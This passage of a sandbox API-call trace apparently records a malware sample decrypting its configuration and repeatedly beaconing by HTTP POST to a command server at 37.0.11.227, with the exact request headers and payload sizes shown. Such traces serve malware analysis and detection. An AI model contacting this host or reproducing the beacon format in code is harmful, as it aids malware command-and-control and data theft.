returned 1 [0197.369] GetProcessHeap () returned 0x690000 [0197.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0197.370] GetProcessHeap () returned 0x690000 [0197.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.370] GetProcessHeap () returned 0x690000 [0197.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0197.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.371] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.377] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0197.382] GetProcessHeap () returned 0x690000 [0197.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0197.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.383] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.384] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.385] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.385] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.385] GetProcessHeap () returned 0x690000 [0197.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0197.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.386] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0197.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.387] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.388] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0197.388] GetProcessHeap () returned 0x690000 [0197.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0197.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.389] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0197.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.389] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0197.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.390] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0197.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.391] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0197.391] GetProcessHeap () returned 0x690000 [0197.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0197.391] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adb80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0197.391] GetProcessHeap () returned 0x690000 [0197.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0197.391] socket (af=2, type=1, protocol=6) returned 0x404 [0197.392] connect (s=0x404, name=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0197.415] FreeAddrInfoW (pAddrInfo=0x6adb80*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea90*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0197.415] GetProcessHeap () returned 0x690000 [0197.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0197.415] GetProcessHeap () returned 0x690000 [0197.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0197.416] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.417] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.417] GetProcessHeap () returned 0x690000 [0197.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0197.417] GetProcessHeap () returned 0x690000 [0197.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.418] GetProcessHeap () returned 0x690000 [0197.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0197.418] GetProcessHeap () returned 0x690000 [0197.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0197.418] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.419] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.419] GetProcessHeap () returned 0x690000 [0197.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0197.419] GetProcessHeap () returned 0x690000 [0197.420] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.420] send (s=0x404, buf=0x6abd08*, len=242, flags=0) returned 242 [0197.420] send (s=0x404, buf=0x6aba40*, len=159, flags=0) returned 159 [0197.420] GetProcessHeap () returned 0x690000 [0197.420] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0197.420] recv (in: s=0x404, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0197.494] GetProcessHeap () returned 0x690000 [0197.495] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0197.495] GetProcessHeap () returned 0x690000 [0197.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0197.496] GetProcessHeap () returned 0x690000 [0197.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0197.496] GetProcessHeap () returned 0x690000 [0197.496] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0197.496] closesocket (s=0x404) returned 0 [0197.497] GetProcessHeap () returned 0x690000 [0197.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0197.497] GetProcessHeap () returned 0x690000 [0197.497] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0197.497] GetProcessHeap () returned 0x690000 [0197.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.498] GetProcessHeap () returned 0x690000 [0197.498] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0197.499] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1204) returned 0x404 [0197.500] Sleep (dwMilliseconds=0xea60) [0197.501] GetProcessHeap () returned 0x690000 [0197.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0197.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.504] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.510] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0197.515] GetProcessHeap () returned 0x690000 [0197.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0197.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.516] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.517] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.518] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.518] GetProcessHeap () returned 0x690000 [0197.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0197.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.519] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0197.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.520] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.523] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0197.523] GetProcessHeap () returned 0x690000 [0197.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0197.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.525] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.528] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.531] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.533] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.533] GetProcessHeap () returned 0x690000 [0197.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0197.533] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.534] GetProcessHeap () returned 0x690000 [0197.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0197.548] GetProcessHeap () returned 0x690000 [0197.549] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0197.549] GetProcessHeap () returned 0x690000 [0197.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.550] GetProcessHeap () returned 0x690000 [0197.550] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0197.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.551] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.567] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0197.573] GetProcessHeap () returned 0x690000 [0197.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0197.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.574] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.575] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.576] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.576] GetProcessHeap () returned 0x690000 [0197.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0197.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.577] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0197.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.588] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.589] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0197.589] GetProcessHeap () returned 0x690000 [0197.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0197.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.590] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0197.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.591] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0197.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.594] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0197.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.595] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0197.595] GetProcessHeap () returned 0x690000 [0197.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0197.595] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6add60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0197.595] GetProcessHeap () returned 0x690000 [0197.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0197.595] socket (af=2, type=1, protocol=6) returned 0x408 [0197.596] connect (s=0x408, name=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0197.618] FreeAddrInfoW (pAddrInfo=0x6add60*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8e0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0197.618] GetProcessHeap () returned 0x690000 [0197.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0197.618] GetProcessHeap () returned 0x690000 [0197.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0197.619] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.620] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.620] GetProcessHeap () returned 0x690000 [0197.620] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0197.620] GetProcessHeap () returned 0x690000 [0197.620] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.622] GetProcessHeap () returned 0x690000 [0197.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0197.622] GetProcessHeap () returned 0x690000 [0197.622] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0197.623] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.624] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.624] GetProcessHeap () returned 0x690000 [0197.624] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0197.624] GetProcessHeap () returned 0x690000 [0197.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.624] send (s=0x408, buf=0x6abd08*, len=242, flags=0) returned 242 [0197.625] send (s=0x408, buf=0x6aba40*, len=159, flags=0) returned 159 [0197.625] GetProcessHeap () returned 0x690000 [0197.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0197.625] recv (in: s=0x408, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0197.717] GetProcessHeap () returned 0x690000 [0197.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0197.718] GetProcessHeap () returned 0x690000 [0197.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0197.718] GetProcessHeap () returned 0x690000 [0197.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0197.719] GetProcessHeap () returned 0x690000 [0197.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0197.719] closesocket (s=0x408) returned 0 [0197.719] GetProcessHeap () returned 0x690000 [0197.719] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0197.719] GetProcessHeap () returned 0x690000 [0197.720] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0197.755] GetProcessHeap () returned 0x690000 [0197.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.756] GetProcessHeap () returned 0x690000 [0197.756] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0197.756] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1208) returned 0x408 [0197.759] Sleep (dwMilliseconds=0xea60) [0197.761] GetProcessHeap () returned 0x690000 [0197.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0197.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.768] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0197.774] GetProcessHeap () returned 0x690000 [0197.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0197.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.775] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.776] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.777] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.777] GetProcessHeap () returned 0x690000 [0197.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0197.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.779] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0197.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.780] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.780] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0197.780] GetProcessHeap () returned 0x690000 [0197.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0197.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.781] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.782] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.783] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.784] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.784] GetProcessHeap () returned 0x690000 [0197.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0197.784] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.788] GetProcessHeap () returned 0x690000 [0197.789] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0197.789] GetProcessHeap () returned 0x690000 [0197.789] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0197.790] GetProcessHeap () returned 0x690000 [0197.790] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0197.791] GetProcessHeap () returned 0x690000 [0197.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0197.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.793] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.799] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0197.805] GetProcessHeap () returned 0x690000 [0197.805] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0197.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.807] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, 